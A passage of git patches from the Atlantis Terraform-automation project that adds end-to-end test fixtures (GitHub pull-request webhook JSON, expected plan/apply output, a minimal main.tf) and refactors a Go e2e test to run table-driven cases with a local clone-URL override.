"labels": [ + + ], + "state": "open", + "locked": false, + "assignee": null, + "assignees": [ + + ], + "milestone": null, + "comments": 61, + "created_at": "2018-06-07T12:45:41Z", + "updated_at": "2018-06-13T12:53:40Z", + "closed_at": null, + "author_association": "OWNER", + "pull_request": { + "url": "https://api.github.com/repos/runatlantis/atlantis-tests/pulls/1", + "html_url": "https://github.com/runatlantis/atlantis-tests/pull/1", + "diff_url": "https://github.com/runatlantis/atlantis-tests/pull/1.diff", + "patch_url": "https://github.com/runatlantis/atlantis-tests/pull/1.patch" + }, + "body": "" + }, + "comment": { + "url": "https://api.github.com/repos/runatlantis/atlantis-tests/issues/comments/396926483", + "html_url": "https://github.com/runatlantis/atlantis-tests/pull/1#issuecomment-396926483", + "issue_url": "https://api.github.com/repos/runatlantis/atlantis-tests/issues/1", + "id": 396926483, + "node_id": "MDEyOklzc3VlQ29tbWVudDM5NjkyNjQ4Mw==", + "user": { + "login": "runatlantis", + "id": 1034429, + "node_id": "MDQ6VXNlcjEwMzQ0Mjk=", + "avatar_url": "https://avatars1.githubusercontent.com/u/1034429?v=4", + "gravatar_id": "", + "url": "https://api.github.com/users/runatlantis", + "html_url": "https://github.com/runatlantis", + "followers_url": "https://api.github.com/users/runatlantis/followers", + "following_url": "https://api.github.com/users/runatlantis/following{/other_user}", + "gists_url": "https://api.github.com/users/runatlantis/gists{/gist_id}", + "starred_url": "https://api.github.com/users/runatlantis/starred{/owner}{/repo}", + "subscriptions_url": "https://api.github.com/users/runatlantis/subscriptions", + "organizations_url": "https://api.github.com/users/runatlantis/orgs", + "repos_url": "https://api.github.com/users/runatlantis/repos", + "events_url": "https://api.github.com/users/runatlantis/events{/privacy}", + "received_events_url": "https://api.github.com/users/runatlantis/received_events", + "type": "User", + "site_admin": false + }, 
+ "created_at": "2018-06-13T12:53:40Z", + "updated_at": "2018-06-13T12:53:40Z", + "author_association": "OWNER", + "body": "###comment body###" + }, + "repository": { + "id": 136474117, + "node_id": "MDEwOlJlcG9zaXRvcnkxMzY0NzQxMTc=", + "name": "atlantis-tests", + "full_name": "runatlantis/atlantis-tests", + "owner": { + "login": "runatlantis", + "id": 1034429, + "node_id": "MDQ6VXNlcjEwMzQ0Mjk=", + "avatar_url": "https://avatars1.githubusercontent.com/u/1034429?v=4", + "gravatar_id": "", + "url": "https://api.github.com/users/runatlantis", + "html_url": "https://github.com/runatlantis", + "followers_url": "https://api.github.com/users/runatlantis/followers", + "following_url": "https://api.github.com/users/runatlantis/following{/other_user}", + "gists_url": "https://api.github.com/users/runatlantis/gists{/gist_id}", + "starred_url": "https://api.github.com/users/runatlantis/starred{/owner}{/repo}", + "subscriptions_url": "https://api.github.com/users/runatlantis/subscriptions", + "organizations_url": "https://api.github.com/users/runatlantis/orgs", + "repos_url": "https://api.github.com/users/runatlantis/repos", + "events_url": "https://api.github.com/users/runatlantis/events{/privacy}", + "received_events_url": "https://api.github.com/users/runatlantis/received_events", + "type": "User", + "site_admin": false + }, + "private": false, + "html_url": "https://github.com/runatlantis/atlantis-tests", + "description": "A set of terraform projects that atlantis e2e tests run on.", + "fork": true, + "url": "https://api.github.com/repos/runatlantis/atlantis-tests", + "forks_url": "https://api.github.com/repos/runatlantis/atlantis-tests/forks", + "keys_url": "https://api.github.com/repos/runatlantis/atlantis-tests/keys{/key_id}", + "collaborators_url": "https://api.github.com/repos/runatlantis/atlantis-tests/collaborators{/collaborator}", + "teams_url": "https://api.github.com/repos/runatlantis/atlantis-tests/teams", + "hooks_url": 
"https://api.github.com/repos/runatlantis/atlantis-tests/hooks", + "issue_events_url": "https://api.github.com/repos/runatlantis/atlantis-tests/issues/events{/number}", + "events_url": "https://api.github.com/repos/runatlantis/atlantis-tests/events", + "assignees_url": "https://api.github.com/repos/runatlantis/atlantis-tests/assignees{/user}", + "branches_url": "https://api.github.com/repos/runatlantis/atlantis-tests/branches{/branch}", + "tags_url": "https://api.github.com/repos/runatlantis/atlantis-tests/tags", + "blobs_url": "https://api.github.com/repos/runatlantis/atlantis-tests/git/blobs{/sha}", + "git_tags_url": "https://api.github.com/repos/runatlantis/atlantis-tests/git/tags{/sha}", + "git_refs_url": "https://api.github.com/repos/runatlantis/atlantis-tests/git/refs{/sha}", + "trees_url": "https://api.github.com/repos/runatlantis/atlantis-tests/git/trees{/sha}", + "statuses_url": "https://api.github.com/repos/runatlantis/atlantis-tests/statuses/{sha}", + "languages_url": "https://api.github.com/repos/runatlantis/atlantis-tests/languages", + "stargazers_url": "https://api.github.com/repos/runatlantis/atlantis-tests/stargazers", + "contributors_url": "https://api.github.com/repos/runatlantis/atlantis-tests/contributors", + "subscribers_url": "https://api.github.com/repos/runatlantis/atlantis-tests/subscribers", + "subscription_url": "https://api.github.com/repos/runatlantis/atlantis-tests/subscription", + "commits_url": "https://api.github.com/repos/runatlantis/atlantis-tests/commits{/sha}", + "git_commits_url": "https://api.github.com/repos/runatlantis/atlantis-tests/git/commits{/sha}", + "comments_url": "https://api.github.com/repos/runatlantis/atlantis-tests/comments{/number}", + "issue_comment_url": "https://api.github.com/repos/runatlantis/atlantis-tests/issues/comments{/number}", + "contents_url": "https://api.github.com/repos/runatlantis/atlantis-tests/contents/{+path}", + "compare_url": 
"https://api.github.com/repos/runatlantis/atlantis-tests/compare/{base}...{head}", + "merges_url": "https://api.github.com/repos/runatlantis/atlantis-tests/merges", + "archive_url": "https://api.github.com/repos/runatlantis/atlantis-tests/{archive_format}{/ref}", + "downloads_url": "https://api.github.com/repos/runatlantis/atlantis-tests/downloads", + "issues_url": "https://api.github.com/repos/runatlantis/atlantis-tests/issues{/number}", + "pulls_url": "https://api.github.com/repos/runatlantis/atlantis-tests/pulls{/number}", + "milestones_url": "https://api.github.com/repos/runatlantis/atlantis-tests/milestones{/number}", + "notifications_url": "https://api.github.com/repos/runatlantis/atlantis-tests/notifications{?since,all,participating}", + "labels_url": "https://api.github.com/repos/runatlantis/atlantis-tests/labels{/name}", + "releases_url": "https://api.github.com/repos/runatlantis/atlantis-tests/releases{/id}", + "deployments_url": "https://api.github.com/repos/runatlantis/atlantis-tests/deployments", + "created_at": "2018-06-07T12:28:23Z", + "updated_at": "2018-06-07T12:28:27Z", + "pushed_at": "2018-06-11T16:22:17Z", + "git_url": "git://github.com/runatlantis/atlantis-tests.git", + "ssh_url": "git@github.com:runatlantis/atlantis-tests.git", + "clone_url": "https://github.com/runatlantis/atlantis-tests.git", + "svn_url": "https://github.com/runatlantis/atlantis-tests", + "homepage": null, + "size": 8, + "stargazers_count": 0, + "watchers_count": 0, + "language": "HCL", + "has_issues": false, + "has_projects": true, + "has_downloads": true, + "has_wiki": false, + "has_pages": false, + "forks_count": 0, + "mirror_url": null, + "archived": false, + "open_issues_count": 2, + "license": { + "key": "other", + "name": "Other", + "spdx_id": null, + "url": null, + "node_id": "MDc6TGljZW5zZTA=" + }, + "forks": 0, + "open_issues": 2, + "watchers": 0, + "default_branch": "master" + }, + "sender": { + "login": "runatlantis", + "id": 1034429, + "node_id": 
"MDQ6VXNlcjEwMzQ0Mjk=", + "avatar_url": "https://avatars1.githubusercontent.com/u/1034429?v=4", + "gravatar_id": "", + "url": "https://api.github.com/users/runatlantis", + "html_url": "https://github.com/runatlantis", + "followers_url": "https://api.github.com/users/runatlantis/followers", + "following_url": "https://api.github.com/users/runatlantis/following{/other_user}", + "gists_url": "https://api.github.com/users/runatlantis/gists{/gist_id}", + "starred_url": "https://api.github.com/users/runatlantis/starred{/owner}{/repo}", + "subscriptions_url": "https://api.github.com/users/runatlantis/subscriptions", + "organizations_url": "https://api.github.com/users/runatlantis/orgs", + "repos_url": "https://api.github.com/users/runatlantis/repos", + "events_url": "https://api.github.com/users/runatlantis/events{/privacy}", + "received_events_url": "https://api.github.com/users/runatlantis/received_events", + "type": "User", + "site_admin": false + } +} \ No newline at end of file diff --git a/server/testfixtures/test-repos/simple/exp-output-atlantis-plan.txt b/server/testfixtures/test-repos/simple/exp-output-atlantis-plan.txt new file mode 100644 index 0000000000..15a712c428 --- /dev/null +++ b/server/testfixtures/test-repos/simple/exp-output-atlantis-plan.txt @@ -0,0 +1,23 @@ +Ran Plan in dir: `.` workspace: `default` +```diff +Refreshing Terraform state in-memory prior to plan... +The refreshed state will be used to calculate this plan, but will not be +persisted to local or remote state storage. + + +------------------------------------------------------------------------ + +An execution plan has been generated and is shown below. +Resource actions are indicated with the following symbols: + + create + +Terraform will perform the following actions: + ++ null_resource.simple + id: +Plan: 1 to add, 0 to change, 0 to destroy. + +``` + +* To **discard** this plan click [here](lock-url). 
+ diff --git a/server/testfixtures/test-repos/simple/main.tf b/server/testfixtures/test-repos/simple/main.tf new file mode 100644 index 0000000000..648c412e1f --- /dev/null +++ b/server/testfixtures/test-repos/simple/main.tf @@ -0,0 +1,3 @@ +resource "null_resource" "simple" { + count = 1 +} \ No newline at end of file From a9e9e18f2e4e648afb5051bc063dd8a60bc75da0 Mon Sep 17 00:00:00 2001 From: Luke Kysow Date: Sat, 16 Jun 2018 18:11:30 +0100 Subject: [PATCH 24/69] Enable multiple cases for e2e testing --- server/events/atlantis_workspace.go | 9 +- server/events_controller.go | 7 +- server/events_controller_e2e_test.go | 164 ++++-- .../githubPullRequestClosedEvent.json | 468 ++++++++++++++++++ .../githubPullRequestOpenedEvent.json | 468 ++++++++++++++++++ .../testfixtures/test-repos/simple/.gitkeep | 0 .../test-repos/simple/exp-output-apply.txt | 13 + .../test-repos/simple/exp-output-autoplan.txt | 23 + .../test-repos/simple/exp-output-merge.txt | 3 + server/testfixtures/test-repos/simple/main.tf | 8 + 10 files changed, 1126 insertions(+), 37 deletions(-) create mode 100644 server/testfixtures/githubPullRequestClosedEvent.json create mode 100644 server/testfixtures/githubPullRequestOpenedEvent.json create mode 100644 server/testfixtures/test-repos/simple/.gitkeep create mode 100644 server/testfixtures/test-repos/simple/exp-output-apply.txt create mode 100644 server/testfixtures/test-repos/simple/exp-output-autoplan.txt create mode 100644 server/testfixtures/test-repos/simple/exp-output-merge.txt diff --git a/server/events/atlantis_workspace.go b/server/events/atlantis_workspace.go index a57aee053f..190b87790d 100644 --- a/server/events/atlantis_workspace.go +++ b/server/events/atlantis_workspace.go @@ -42,6 +42,9 @@ type AtlantisWorkspace interface { // FileWorkspace implements AtlantisWorkspace with the file system. type FileWorkspace struct { DataDir string + // TestingOverrideCloneURL can be used during testing to override the URL + // that is cloned. 
If it's empty then we clone normally. + TestingOverrideCloneURL string } // Clone git clones headRepo, checks out the branch and then returns the absolute @@ -68,7 +71,11 @@ func (w *FileWorkspace) Clone( } log.Info("git cloning %q into %q", headRepo.SanitizedCloneURL, cloneDir) - cloneCmd := exec.Command("git", "clone", headRepo.CloneURL, cloneDir) // #nosec + cloneURL := headRepo.CloneURL + if w.TestingOverrideCloneURL != "" { + cloneURL = w.TestingOverrideCloneURL + } + cloneCmd := exec.Command("git", "clone", cloneURL, cloneDir) // #nosec if output, err := cloneCmd.CombinedOutput(); err != nil { return "", errors.Wrapf(err, "cloning %s: %s", headRepo.SanitizedCloneURL, string(output)) } diff --git a/server/events_controller.go b/server/events_controller.go index b205f2eb8d..e9ee6e1e01 100644 --- a/server/events_controller.go +++ b/server/events_controller.go @@ -177,7 +177,12 @@ func (e *EventsController) handlePullRequestEvent(w http.ResponseWriter, baseRep // workspace to '*' to indicate that all applicable dirs and workspaces // should be planned. autoplanCmd := events.NewCommand("*", nil, events.Plan, false, "*", true) - go e.CommandRunner.ExecuteCommand(baseRepo, headRepo, user, pull.Num, autoplanCmd) + if !e.TestingMode { + go e.CommandRunner.ExecuteCommand(baseRepo, headRepo, user, pull.Num, autoplanCmd) + } else { + // When testing we want to wait for everything to complete. + e.CommandRunner.ExecuteCommand(baseRepo, headRepo, user, pull.Num, autoplanCmd) + } return case ClosedPullEvent: // If the pull request was closed, we delete locks. diff --git a/server/events_controller_e2e_test.go b/server/events_controller_e2e_test.go index 97883c0a14..8a9bd66915 100644 --- a/server/events_controller_e2e_test.go +++ b/server/events_controller_e2e_test.go @@ -6,8 +6,8 @@ import ( "io/ioutil" "net/http" "net/http/httptest" - "os" "path/filepath" + "regexp" "strings" "testing" @@ -29,20 +29,111 @@ import ( . 
"github.com/runatlantis/atlantis/testing" ) -func Test(t *testing.T) { +/* +flows: +- pull request opened autoplan +- comment to apply + +github/gitlab + +locking + +merging pull requests + +different repo organizations + +atlantis.yaml + +*/ +func TestGitHubWorkflow(t *testing.T) { RegisterMockTestingT(t) - // Config. + cases := []struct { + Description string + // RepoDir is relative to testfixtures/test-repos. + RepoDir string + ModifiedFiles []string + ExpAutoplanCommentFile string + ExpMergeCommentFile string + CommentAndReplies []string + }{ + { + Description: "simple", + RepoDir: "simple", + ModifiedFiles: []string{"main.tf"}, + ExpAutoplanCommentFile: "exp-output-autoplan.txt", + CommentAndReplies: []string{ + "atlantis apply", "exp-output-apply.txt", + }, + ExpMergeCommentFile: "exp-output-merge.txt", + }, + } + for _, c := range cases { + ctrl, vcsClient, githubGetter, atlantisWorkspace := setupE2E(t) + t.Run(c.Description, func(t *testing.T) { + // Set the repo to be cloned through the testing backdoor. + repoDir, err := filepath.Abs(filepath.Join("testfixtures", "test-repos", c.RepoDir)) + Ok(t, err) + atlantisWorkspace.TestingOverrideCloneURL = fmt.Sprintf("file://%s", repoDir) + + // Setup test dependencies. + w := httptest.NewRecorder() + When(githubGetter.GetPullRequest(AnyRepo(), AnyInt())).ThenReturn(GitHubPullRequestParsed(), nil) + When(vcsClient.GetModifiedFiles(AnyRepo(), matchers.AnyModelsPullRequest())).ThenReturn(c.ModifiedFiles, nil) + + // First, send the open pull request event and trigger an autoplan. + pullOpenedReq := GitHubPullRequestOpenedEvent(t) + ctrl.Post(w, pullOpenedReq) + responseContains(t, w, 200, "Processing...") + _, _, autoplanComment := vcsClient.VerifyWasCalledOnce().CreateComment(AnyRepo(), AnyInt(), AnyString()).GetCapturedArguments() + exp, err := ioutil.ReadFile(filepath.Join(repoDir, c.ExpAutoplanCommentFile)) + Ok(t, err) + Equals(t, string(exp), autoplanComment) + + // Now send any other comments. 
+ for i := 0; i < len(c.CommentAndReplies); i += 2 { + comment := c.CommentAndReplies[i] + expOutputFile := c.CommentAndReplies[i+1] + + commentReq := GitHubCommentEvent(t, comment) + w = httptest.NewRecorder() + ctrl.Post(w, commentReq) + responseContains(t, w, 200, "Processing...") + _, _, autoplanComment = vcsClient.VerifyWasCalled(Twice()).CreateComment(AnyRepo(), AnyInt(), AnyString()).GetCapturedArguments() + + exp, err = ioutil.ReadFile(filepath.Join(repoDir, expOutputFile)) + Ok(t, err) + // Replace all 'ID: 1111818181' strings with * so we can do a comparison. + idRegex := regexp.MustCompile(`\(ID: [0-9]+\)`) + autoplanComment = idRegex.ReplaceAllString(autoplanComment, "(ID: ******************)") + Equals(t, string(exp), autoplanComment) + } + + // Finally, send the pull request merged event. + pullClosedReq := GitHubPullRequestClosedEvent(t) + w = httptest.NewRecorder() + ctrl.Post(w, pullClosedReq) + responseContains(t, w, 200, "Pull request cleaned successfully") + _, _, pullClosedComment := vcsClient.VerifyWasCalled(Times(3)).CreateComment(AnyRepo(), AnyInt(), AnyString()).GetCapturedArguments() + exp, err = ioutil.ReadFile(filepath.Join(repoDir, c.ExpMergeCommentFile)) + Ok(t, err) + Equals(t, string(exp), pullClosedComment) + }) + } +} + +func setupE2E(t *testing.T) (server.EventsController, *vcsmocks.MockClientProxy, *mocks.MockGithubPullGetter, *events.FileWorkspace) { allowForkPRs := false dataDir, cleanup := TempDir(t) defer cleanup() + testRepoDir, err := filepath.Abs("testfixtures/test-repos/simple") + Ok(t, err) // Mocks. e2eVCSClient := vcsmocks.NewMockClientProxy() e2eStatusUpdater := mocks.NewMockCommitStatusUpdater() e2eGithubGetter := mocks.NewMockGithubPullGetter() e2eGitlabGetter := mocks.NewMockGitlabMergeRequestGetter() - e2eWorkspace := mocks.NewMockAtlantisWorkspace() // Real dependencies. 
logger := logging.NewSimpleLogger("server", nil, true, logging.Debug) @@ -66,6 +157,10 @@ func Test(t *testing.T) { projectLocker := &events.DefaultProjectLocker{ Locker: lockingClient, } + atlantisWorkspace := &events.FileWorkspace{ + DataDir: dataDir, + TestingOverrideCloneURL: testRepoDir, + } defaultTFVersion := terraformClient.Version() commandHandler := &events.CommandHandler{ @@ -85,7 +180,7 @@ func Test(t *testing.T) { ParserValidator: &yaml.ParserValidator{}, ProjectFinder: &events.DefaultProjectFinder{}, VCSClient: e2eVCSClient, - Workspace: e2eWorkspace, + Workspace: atlantisWorkspace, ProjectOperator: events.ProjectOperator{ Locker: projectLocker, LockURLGenerator: &mockLockURLGenerator{}, @@ -104,16 +199,20 @@ func Test(t *testing.T) { ApprovalOperator: runtime.ApprovalOperator{ VCSClient: e2eVCSClient, }, - Workspace: e2eWorkspace, + Workspace: atlantisWorkspace, Webhooks: &mockWebhookSender{}, }, }, } ctrl := server.EventsController{ - TestingMode: true, - CommandRunner: commandHandler, - PullCleaner: nil, + TestingMode: true, + CommandRunner: commandHandler, + PullCleaner: &events.PullClosedExecutor{ + Locker: lockingClient, + VCSClient: e2eVCSClient, + Workspace: atlantisWorkspace, + }, Logger: logger, Parser: eventParser, CommentParser: commentParser, @@ -133,32 +232,7 @@ func Test(t *testing.T) { Username: "atlantisbot", }, } - - // Test GitHub Post - req := GitHubCommentEvent(t, "atlantis plan") - w := httptest.NewRecorder() - When(e2eGithubGetter.GetPullRequest(AnyRepo(), AnyInt())).ThenReturn(GitHubPullRequestParsed(), nil) - testRepoDir, err := filepath.Abs("testfixtures/test-repos/simple") - Ok(t, err) - When(e2eWorkspace.Clone(matchers.AnyPtrToLoggingSimpleLogger(), AnyRepo(), AnyRepo(), matchers.AnyModelsPullRequest(), AnyString())).ThenReturn(testRepoDir, nil) - // Clean up .terraform and plan files when we're done. 
- defer func() { - os.RemoveAll(filepath.Join(testRepoDir, ".terraform")) - planFiles, _ := filepath.Glob(testRepoDir + "/*.tfplan") - for _, file := range planFiles { - os.Remove(file) - } - }() - - ctrl.Post(w, req) - responseContains(t, w, 200, "Processing...") - _, _, comment := e2eVCSClient.VerifyWasCalledOnce().CreateComment(AnyRepo(), AnyInt(), AnyString()).GetCapturedArguments() - - exp, err := ioutil.ReadFile(filepath.Join(testRepoDir, "exp-output-atlantis-plan.txt")) - fmt.Println((string(exp))) - Ok(t, err) - - Equals(t, string(exp), comment) + return ctrl, e2eVCSClient, e2eGithubGetter, atlantisWorkspace } type mockLockURLGenerator struct{} @@ -184,6 +258,26 @@ func GitHubCommentEvent(t *testing.T, comment string) *http.Request { return req } +func GitHubPullRequestOpenedEvent(t *testing.T) *http.Request { + requestJSON, err := ioutil.ReadFile(filepath.Join("testfixtures", "githubPullRequestOpenedEvent.json")) + Ok(t, err) + req, err := http.NewRequest("POST", "/events", bytes.NewBuffer(requestJSON)) + Ok(t, err) + req.Header.Set("Content-Type", "application/json") + req.Header.Set(githubHeader, "pull_request") + return req +} + +func GitHubPullRequestClosedEvent(t *testing.T) *http.Request { + requestJSON, err := ioutil.ReadFile(filepath.Join("testfixtures", "githubPullRequestClosedEvent.json")) + Ok(t, err) + req, err := http.NewRequest("POST", "/events", bytes.NewBuffer(requestJSON)) + Ok(t, err) + req.Header.Set("Content-Type", "application/json") + req.Header.Set(githubHeader, "pull_request") + return req +} + func GitHubPullRequestParsed() *github.PullRequest { return &github.PullRequest{ Number: github.Int(1), diff --git a/server/testfixtures/githubPullRequestClosedEvent.json b/server/testfixtures/githubPullRequestClosedEvent.json new file mode 100644 index 0000000000..1fd568761e --- /dev/null +++ b/server/testfixtures/githubPullRequestClosedEvent.json @@ -0,0 +1,468 @@ +{ + "action": "closed", + "number": 1, + "pull_request": { + "url": 
"https://api.github.com/repos/runatlantis/atlantis-tests/pulls/1", + "id": 193308707, + "node_id": "MDExOlB1bGxSZXF1ZXN0MTkzMzA4NzA3", + "html_url": "https://github.com/runatlantis/atlantis-tests/pull/1", + "diff_url": "https://github.com/runatlantis/atlantis-tests/pull/1.diff", + "patch_url": "https://github.com/runatlantis/atlantis-tests/pull/1.patch", + "issue_url": "https://api.github.com/repos/runatlantis/atlantis-tests/issues/1", + "number": 1, + "state": "closed", + "locked": false, + "title": "Add new project layouts", + "user": { + "login": "runatlantis", + "id": 1034429, + "node_id": "MDQ6VXNlcjEwMzQ0Mjk=", + "avatar_url": "https://avatars1.githubusercontent.com/u/1034429?v=4", + "gravatar_id": "", + "url": "https://api.github.com/users/runatlantis", + "html_url": "https://github.com/runatlantis", + "followers_url": "https://api.github.com/users/runatlantis/followers", + "following_url": "https://api.github.com/users/runatlantis/following{/other_user}", + "gists_url": "https://api.github.com/users/runatlantis/gists{/gist_id}", + "starred_url": "https://api.github.com/users/runatlantis/starred{/owner}{/repo}", + "subscriptions_url": "https://api.github.com/users/runatlantis/subscriptions", + "organizations_url": "https://api.github.com/users/runatlantis/orgs", + "repos_url": "https://api.github.com/users/runatlantis/repos", + "events_url": "https://api.github.com/users/runatlantis/events{/privacy}", + "received_events_url": "https://api.github.com/users/runatlantis/received_events", + "type": "User", + "site_admin": false + }, + "body": "", + "created_at": "2018-06-07T12:45:41Z", + "updated_at": "2018-06-16T16:55:19Z", + "closed_at": "2018-06-16T16:55:19Z", + "merged_at": null, + "merge_commit_sha": "e96e1cea0d79f4ff07845060ade0b21ff1ffe37f", + "assignee": null, + "assignees": [ + + ], + "requested_reviewers": [ + + ], + "requested_teams": [ + + ], + "labels": [ + + ], + "milestone": null, + "commits_url": 
"https://api.github.com/repos/runatlantis/atlantis-tests/pulls/1/commits", + "review_comments_url": "https://api.github.com/repos/runatlantis/atlantis-tests/pulls/1/comments", + "review_comment_url": "https://api.github.com/repos/runatlantis/atlantis-tests/pulls/comments{/number}", + "comments_url": "https://api.github.com/repos/runatlantis/atlantis-tests/issues/1/comments", + "statuses_url": "https://api.github.com/repos/runatlantis/atlantis-tests/statuses/5e2d140b2d74bf61675677f01dc947ae8512e18e", + "head": { + "label": "runatlantis:atlantisyaml", + "ref": "atlantisyaml", + "sha": "5e2d140b2d74bf61675677f01dc947ae8512e18e", + "user": { + "login": "runatlantis", + "id": 1034429, + "node_id": "MDQ6VXNlcjEwMzQ0Mjk=", + "avatar_url": "https://avatars1.githubusercontent.com/u/1034429?v=4", + "gravatar_id": "", + "url": "https://api.github.com/users/runatlantis", + "html_url": "https://github.com/runatlantis", + "followers_url": "https://api.github.com/users/runatlantis/followers", + "following_url": "https://api.github.com/users/runatlantis/following{/other_user}", + "gists_url": "https://api.github.com/users/runatlantis/gists{/gist_id}", + "starred_url": "https://api.github.com/users/runatlantis/starred{/owner}{/repo}", + "subscriptions_url": "https://api.github.com/users/runatlantis/subscriptions", + "organizations_url": "https://api.github.com/users/runatlantis/orgs", + "repos_url": "https://api.github.com/users/runatlantis/repos", + "events_url": "https://api.github.com/users/runatlantis/events{/privacy}", + "received_events_url": "https://api.github.com/users/runatlantis/received_events", + "type": "User", + "site_admin": false + }, + "repo": { + "id": 136474117, + "node_id": "MDEwOlJlcG9zaXRvcnkxMzY0NzQxMTc=", + "name": "atlantis-tests", + "full_name": "runatlantis/atlantis-tests", + "owner": { + "login": "runatlantis", + "id": 1034429, + "node_id": "MDQ6VXNlcjEwMzQ0Mjk=", + "avatar_url": "https://avatars1.githubusercontent.com/u/1034429?v=4", + "gravatar_id": 
"", + "url": "https://api.github.com/users/runatlantis", + "html_url": "https://github.com/runatlantis", + "followers_url": "https://api.github.com/users/runatlantis/followers", + "following_url": "https://api.github.com/users/runatlantis/following{/other_user}", + "gists_url": "https://api.github.com/users/runatlantis/gists{/gist_id}", + "starred_url": "https://api.github.com/users/runatlantis/starred{/owner}{/repo}", + "subscriptions_url": "https://api.github.com/users/runatlantis/subscriptions", + "organizations_url": "https://api.github.com/users/runatlantis/orgs", + "repos_url": "https://api.github.com/users/runatlantis/repos", + "events_url": "https://api.github.com/users/runatlantis/events{/privacy}", + "received_events_url": "https://api.github.com/users/runatlantis/received_events", + "type": "User", + "site_admin": false + }, + "private": false, + "html_url": "https://github.com/runatlantis/atlantis-tests", + "description": "A set of terraform projects that atlantis e2e tests run on.", + "fork": true, + "url": "https://api.github.com/repos/runatlantis/atlantis-tests", + "forks_url": "https://api.github.com/repos/runatlantis/atlantis-tests/forks", + "keys_url": "https://api.github.com/repos/runatlantis/atlantis-tests/keys{/key_id}", + "collaborators_url": "https://api.github.com/repos/runatlantis/atlantis-tests/collaborators{/collaborator}", + "teams_url": "https://api.github.com/repos/runatlantis/atlantis-tests/teams", + "hooks_url": "https://api.github.com/repos/runatlantis/atlantis-tests/hooks", + "issue_events_url": "https://api.github.com/repos/runatlantis/atlantis-tests/issues/events{/number}", + "events_url": "https://api.github.com/repos/runatlantis/atlantis-tests/events", + "assignees_url": "https://api.github.com/repos/runatlantis/atlantis-tests/assignees{/user}", + "branches_url": "https://api.github.com/repos/runatlantis/atlantis-tests/branches{/branch}", + "tags_url": "https://api.github.com/repos/runatlantis/atlantis-tests/tags", + 
"blobs_url": "https://api.github.com/repos/runatlantis/atlantis-tests/git/blobs{/sha}", + "git_tags_url": "https://api.github.com/repos/runatlantis/atlantis-tests/git/tags{/sha}", + "git_refs_url": "https://api.github.com/repos/runatlantis/atlantis-tests/git/refs{/sha}", + "trees_url": "https://api.github.com/repos/runatlantis/atlantis-tests/git/trees{/sha}", + "statuses_url": "https://api.github.com/repos/runatlantis/atlantis-tests/statuses/{sha}", + "languages_url": "https://api.github.com/repos/runatlantis/atlantis-tests/languages", + "stargazers_url": "https://api.github.com/repos/runatlantis/atlantis-tests/stargazers", + "contributors_url": "https://api.github.com/repos/runatlantis/atlantis-tests/contributors", + "subscribers_url": "https://api.github.com/repos/runatlantis/atlantis-tests/subscribers", + "subscription_url": "https://api.github.com/repos/runatlantis/atlantis-tests/subscription", + "commits_url": "https://api.github.com/repos/runatlantis/atlantis-tests/commits{/sha}", + "git_commits_url": "https://api.github.com/repos/runatlantis/atlantis-tests/git/commits{/sha}", + "comments_url": "https://api.github.com/repos/runatlantis/atlantis-tests/comments{/number}", + "issue_comment_url": "https://api.github.com/repos/runatlantis/atlantis-tests/issues/comments{/number}", + "contents_url": "https://api.github.com/repos/runatlantis/atlantis-tests/contents/{+path}", + "compare_url": "https://api.github.com/repos/runatlantis/atlantis-tests/compare/{base}...{head}", + "merges_url": "https://api.github.com/repos/runatlantis/atlantis-tests/merges", + "archive_url": "https://api.github.com/repos/runatlantis/atlantis-tests/{archive_format}{/ref}", + "downloads_url": "https://api.github.com/repos/runatlantis/atlantis-tests/downloads", + "issues_url": "https://api.github.com/repos/runatlantis/atlantis-tests/issues{/number}", + "pulls_url": "https://api.github.com/repos/runatlantis/atlantis-tests/pulls{/number}", + "milestones_url": 
"https://api.github.com/repos/runatlantis/atlantis-tests/milestones{/number}", + "notifications_url": "https://api.github.com/repos/runatlantis/atlantis-tests/notifications{?since,all,participating}", + "labels_url": "https://api.github.com/repos/runatlantis/atlantis-tests/labels{/name}", + "releases_url": "https://api.github.com/repos/runatlantis/atlantis-tests/releases{/id}", + "deployments_url": "https://api.github.com/repos/runatlantis/atlantis-tests/deployments", + "created_at": "2018-06-07T12:28:23Z", + "updated_at": "2018-06-07T12:28:27Z", + "pushed_at": "2018-06-11T16:22:17Z", + "git_url": "git://github.com/runatlantis/atlantis-tests.git", + "ssh_url": "git@github.com:runatlantis/atlantis-tests.git", + "clone_url": "https://github.com/runatlantis/atlantis-tests.git", + "svn_url": "https://github.com/runatlantis/atlantis-tests", + "homepage": null, + "size": 8, + "stargazers_count": 0, + "watchers_count": 0, + "language": "HCL", + "has_issues": false, + "has_projects": true, + "has_downloads": true, + "has_wiki": false, + "has_pages": false, + "forks_count": 0, + "mirror_url": null, + "archived": false, + "open_issues_count": 1, + "license": { + "key": "other", + "name": "Other", + "spdx_id": null, + "url": null, + "node_id": "MDc6TGljZW5zZTA=" + }, + "forks": 0, + "open_issues": 1, + "watchers": 0, + "default_branch": "master" + } + }, + "base": { + "label": "runatlantis:master", + "ref": "master", + "sha": "f59a822e83b3cd193142c7624ea635a5d7894388", + "user": { + "login": "runatlantis", + "id": 1034429, + "node_id": "MDQ6VXNlcjEwMzQ0Mjk=", + "avatar_url": "https://avatars1.githubusercontent.com/u/1034429?v=4", + "gravatar_id": "", + "url": "https://api.github.com/users/runatlantis", + "html_url": "https://github.com/runatlantis", + "followers_url": "https://api.github.com/users/runatlantis/followers", + "following_url": "https://api.github.com/users/runatlantis/following{/other_user}", + "gists_url": 
"https://api.github.com/users/runatlantis/gists{/gist_id}", + "starred_url": "https://api.github.com/users/runatlantis/starred{/owner}{/repo}", + "subscriptions_url": "https://api.github.com/users/runatlantis/subscriptions", + "organizations_url": "https://api.github.com/users/runatlantis/orgs", + "repos_url": "https://api.github.com/users/runatlantis/repos", + "events_url": "https://api.github.com/users/runatlantis/events{/privacy}", + "received_events_url": "https://api.github.com/users/runatlantis/received_events", + "type": "User", + "site_admin": false + }, + "repo": { + "id": 136474117, + "node_id": "MDEwOlJlcG9zaXRvcnkxMzY0NzQxMTc=", + "name": "atlantis-tests", + "full_name": "runatlantis/atlantis-tests", + "owner": { + "login": "runatlantis", + "id": 1034429, + "node_id": "MDQ6VXNlcjEwMzQ0Mjk=", + "avatar_url": "https://avatars1.githubusercontent.com/u/1034429?v=4", + "gravatar_id": "", + "url": "https://api.github.com/users/runatlantis", + "html_url": "https://github.com/runatlantis", + "followers_url": "https://api.github.com/users/runatlantis/followers", + "following_url": "https://api.github.com/users/runatlantis/following{/other_user}", + "gists_url": "https://api.github.com/users/runatlantis/gists{/gist_id}", + "starred_url": "https://api.github.com/users/runatlantis/starred{/owner}{/repo}", + "subscriptions_url": 